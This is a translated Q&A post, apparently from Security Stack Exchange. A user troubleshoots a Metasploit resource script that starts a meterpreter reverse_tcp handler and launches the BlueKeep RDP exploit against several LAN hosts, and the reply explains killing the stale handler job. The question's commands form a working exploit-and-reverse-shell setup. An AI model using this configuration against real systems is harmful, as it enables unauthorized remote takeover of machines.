我正在尝试基于这个博客运行以下脚本。
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
setg autorunscript multi_console_command -rc /root/Desktop/folder/met_cmd_file
setg lhost 192.168.0.90
setg lport 4444
set ExitOnSession false
exploit -j
use exploit/windows/rdp/rdp_bluekeep
set EXITFUNC thread
exploit -j然而,我得到了这些错误:
[*] Started reverse TCP handler on 192.168.0.90:4444
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
resource (/root/Desktop/folder/con_cmd_file)> set EXITFUNC thread
EXITFUNC => thread
resource (/root/Desktop/folder/con_cmd_file)> exploit -j
[-] Exploit failed: One or more options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.40
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.50
[-] Handler failed to bind to 192.168.0.90:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.70
[-] Handler failed to bind to 192.168.0.90:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
rhost => 192.168.0.80
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to 192.168.0.90:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[-] Handler failed to bind to 192.168.0.90:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).我已经尝试了建议的这里,通过这样做:
netstat -anpl | grep :4444
tcp 0 0 192.168.0.90:4444 0.0.0.0:* LISTEN 1741/ruby在运行以下命令时,我一无所获:
netstat -anpl | grep :4445但是,无论我使用4444还是4445,结果都是一样的。
运行jobs显示:
0 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://192.168.0.90:4444但我怎么能杀了这份工作?怎么解决这个问题呢?
发布于 2022-01-17 21:45:28
0漏洞:多/处理程序windows/x64/meterpreter/反向tcp_ tcp://192.168.0.90:4444
您有一个现有的“作业”(在后台运行的命令),即端口4444。要杀死它,运行kill X,其中X是作业的ID,在本例中是0。因此,您必须运行kill 0来阻止它。
netstat -anpl | grep :4445没有显示任何结果,因为端口可能没有被使用。使用中的是4444港。
https://security.stackexchange.com/questions/252284
复制相似问题